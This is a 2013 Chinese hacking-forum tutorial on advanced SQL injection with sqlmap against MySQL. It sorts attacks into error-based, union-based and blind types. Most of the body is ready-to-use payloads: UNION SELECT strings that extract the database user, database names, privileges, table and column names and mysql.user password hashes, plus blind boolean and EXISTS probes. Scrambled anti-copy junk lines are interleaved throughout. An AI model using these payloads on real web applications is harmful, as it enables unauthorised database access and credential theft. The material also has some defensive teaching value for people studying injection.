中国网络渗透测试联盟
标题:
sqlmap高级注入
[打印本页]
作者:
admin
时间:
2013-7-16 20:31
标题:
sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
" V6 ]5 T$ \- O+ j9 Q) Y* Z
' r, o3 X8 Z3 e- ~* p6 l% {, d
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
7 C8 G) B2 X9 S! X' O2 b
E+ m. L) J/ ]) {& e4 {* D
分类标准 分类 备注
8 s: U/ v" [+ j: H
按字段类型 整型注入,字符型注入
3 F5 K6 D' t4 K L* R+ W; ?+ [
按出现的位置 get注入,post注入,cookie注入,http header注入
. n; H# V* t& a; e& Z
然而高级注入是这样的
8 w. b* L& W' G
" B- f( `, @5 I7 _ _: H7 j
高级注入分类 条件
& V/ P7 S7 r8 G* B' G# ]; R
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
1 M7 N3 ]9 W) s0 B; K, ?# U
union-based sql 能够使用union,存在数据库,表结构
7 u, E( f c8 @' m H( E5 n
blind sql 存在注入
4 v" r- ~' V$ `9 u/ c" A0 ?
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
2 K# {, a, T! c3 e. C/ ]5 d0 x1 V
9 }, ]' I0 E9 x5 K
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
' p4 [8 ?- H7 U0 S0 r
( {) q! p+ s1 t/ L. y. z- ]
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
: u2 e9 ^ V/ C: @$ n5 l
" T2 x) |! Q7 }2 H
这里用mysql说明
& n. Z# o# y, \* Q4 |5 n1 {: O
& c N3 h3 \4 J% O2 X4 u
e注入坛子里很多了,请看戳我或者再戳我
9 M0 i7 e" e3 r* K/ v$ c/ [* a [
3 o) q7 |9 x4 \2 e, P- A+ F* ^$ h
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
7 \4 e& l. R- W/ i, a
/ E% |( Q* @6 x+ S6 b
获取当前数据库用户名
" a, F. h4 y T* \: G7 O* G
6 g; r1 @0 f: e7 K m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
9 \; o$ z$ r, P6 p2 B9 t: C
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
& Q0 a0 ?" K# r2 f/ ]
L, NULL#
0 k; T% V W2 E' c1 |% z) s
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
' S+ S2 R- b: |% r5 g
* q8 M% K0 m0 ^. w1 O: t# U
获取数据库名
6 L% f h8 P6 |( z( p2 b
0 _$ A6 I9 d' R9 d2 w3 Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
6 c% J% V9 K$ Z# \1 C3 x& Z
获取所有用户名
' J j" a. I0 z5 z$ s7 O' k
0 a& A8 r/ Z4 j9 D9 t# s+ u, y) H
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
) q2 `0 U# K' K8 I6 E2 f" [$ p
查看当前用户权限
- F n, G7 I2 s& y4 N7 S
. K" d2 z2 `# f
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
2 d. L1 F$ J5 G) i0 a& u4 @
尝试获取密码,当然需要有能读mysql数据库的权限
4 s% E t8 p3 N
# @9 |, N8 x5 w" \9 F
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
9 ]2 v5 p5 o$ O [7 |- v' z( a/ \" U" \
获取表名,limit什么的自己搞啦
! b* Q( p1 N9 ]: g1 Z
! ^2 l1 t1 g' H& R& w
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
E0 ]1 T! Y2 l3 t
获取字段名及其类型
9 H6 D! w% i# U- j& {! m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
' N. N. Q7 A, |4 `) ?4 |
6 B( v U3 `% ?1 z$ O, C7 w
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
! }2 i, G$ |% }0 c& A
5 T& d8 a% Y8 r
如:
7 y! w! Y0 Q S* s
获取当前用户名
- k2 T& n& x7 X1 J: ~2 N: y
" W& e7 O% a; @' k0 _( K) x! \" |
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
0 d* y7 b4 ]& c
获取当前数据库
' a+ V3 R! ]+ w" N
, y1 n* k7 c: M
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
6 r/ u, `" q" J9 w% N
获取表名
% Y( g6 [' Z. {1 ^2 Y
! Q8 c1 q8 R# \3 }: f/ Q6 i
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
! \8 P# ^. D: ^$ N3 ^4 p
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
3 O1 U: ~" h0 x
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
) ^' K& N; @- ^1 R& m
爆表
9 i8 W; G1 m* K* p
3 e$ _" f( ]% u9 U3 }
AND EXISTS(select * from table)
( \3 m3 V5 `' p2 X* L1 O
爆字段
1 ~. J: U7 r1 o7 u
& m0 _* G X; l! w( _0 R
AND EXISTS(select pwd from table)
. ?# H9 {0 c" G
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
! E5 C/ e0 a1 \- ^+ _1 l0 r! N
2 Q4 a6 e/ s' `+ M: T5 r
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
$ W$ I; U# j$ r" p1 b
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2